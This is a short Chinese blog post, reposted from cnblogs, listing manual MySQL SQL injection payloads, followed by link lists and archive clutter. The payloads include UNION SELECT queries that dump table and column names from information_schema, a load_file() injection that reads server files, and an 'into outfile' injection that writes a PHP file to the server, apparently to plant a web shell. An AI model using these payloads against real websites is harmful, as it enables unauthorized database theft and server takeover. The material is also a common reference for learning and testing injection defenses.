mysql手工注入

其他 2018-06-10 21:02:46 阅读次数: 2

version()获取数据库版本
database()获取数据库名
user()获取当前用户
@@version_compile_os 获取操作系统
group_concat(欲查询的参数)
获取表名：
注入点 UNION SELECT 1,table_name from information_schema.tables where table_schema=编码后(数据库名)

获取表段和字段：
注入点 UNION SELECT 1,column_name from information_schema.columns where table_name=编码后(表名)

获取指定表下的指定字段信息
注入点 UNION SELECT 1,字段名 from 表名

【拓展】
查看所有表或字段函数 group_concat()

读取:
id=4 union select 1,load_file('路径，或者hex编码不要单引号'),3

导出:
id=4 union select 1,0x45656656,3 into outfile 'F:/1.php'

查指定用户 limit 0,1

猜你喜欢

转载自www.cnblogs.com/slothx/p/9164270.html

mysql手工注入

mysql手工注入演示

MySQL整形手工注入

MySQL手工注入方法

手工注入

PHP+MySQL手工注入语句大全 MySQL手工注入语句总结

SQL注入实战————1、MySQL手工注入实战

MySQL注入-盲注-Dnslog手工注入

mssql手工注入

access手工注入

手工注入原理

Oracle手工注入

sql手工注入

DVWA之php+mysql手工注入

php+mysql手工注入教程

PHP+MySQL 手工注入语句大全推荐

【运维安全】-MySQL手工注入

mysql+access数据库手工注入

MySQL手工注入之基本操作

SQL注入---手工注入

sql注入----手工注入总结

新手科普 | MySQL手工注入之基本注入流程

SQL手工注入技巧

mssql手工注入及绕过术

手工SQL注入详解

postgresql的简单手工注入

SQL手工注入的学习总结

手工sql注入简单入门

常用手工注入语句

手工sql注入（重点）

今日推荐

火速冲上 GitHub 热榜 —— 开源编程语言、框架哪有这么可爱？

北京人形机器人创新中心发布全球首个纯电驱拟人奔跑的全尺寸人形机器人“天工”

LFOSSA 源来如此公开课 | 掌握云原生未来：CNCF 认证全面攻略与备考秘籍

国产云输入法——仅华为无云端数据上传安全问题

开源日报 | 工业开源项目OGG 1.0；姐姐，你要和我一起配置火狐吗；苹果AI遥遥落后？Fedora 40

开放签电子签章：停止新增，优化体验，前进更进（五一假期前工作）

开源日报 | 中学生开源前端动画引擎；全球首个Llama3 8B中文版开源模型；联想电脑恐出局；Linus讽刺AI炒作

周排行

浏览器对同一域名进行请求的最大并发连接数

React Hook之自定义Hook

【转】MyBatis缓存机制

-Java-泛型

自动化测试常用脚本-发送邮件

LeetCode#859: Buddy Strings

java、Python处理字符串

第二篇の博客

Hadoop伪分布式环境安装

SQL Server进阶（十一）临时表、表变量

每日归档

2024-04-27(56)

2024-04-26(39)

2024-04-25(22)

2024-04-24(36)

2024-04-23(26)

2024-04-22(39)

2024-04-21(0)

2024-04-20(6)

2024-04-19(5)

2024-04-18(0)